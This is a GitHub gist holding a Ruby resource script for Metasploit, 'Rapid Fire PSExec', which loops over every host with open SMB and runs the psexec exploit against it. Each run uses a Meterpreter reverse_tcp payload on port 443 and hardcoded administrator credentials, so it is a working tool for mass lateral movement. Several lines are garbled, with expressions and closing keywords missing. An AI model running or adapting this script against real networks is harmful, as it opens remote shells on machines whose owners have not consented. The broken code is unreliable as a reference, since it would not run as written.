Skip to content

Instantly share code, notes, and snippets.

Last active May 7, 2018 00:22
  • Star 1 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
Star You must be signed in to star a gist
What would you like to do?
Rapid Fire PSExec resource script uses service name instead of port number
hosts = []
begin do |service|
if ( =~ /smb/i and service.state == 'open' and service.proto == 'tcp')
hosts << {'ip' =>}
self.run_single("set DisablePayloadHandler true")
hosts.each do |rhost|
self.run_single("set RHOST #{rhost['ip']}")
self.run_single('use exploit/windows/smb/psexec')
self.run_single('set PAYLOAD windows/meterpreter/reverse_tcp')
self.run_single('set LHOST')
self.run_single('set LPORT 443')
self.run_single('set DisablePayloadHandler TRUE')
self.run_single('set SMBUSER administrator')
self.run_single('set SMBPASS leetpassword')
self.run_single('exploit -j')
sleep 1
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment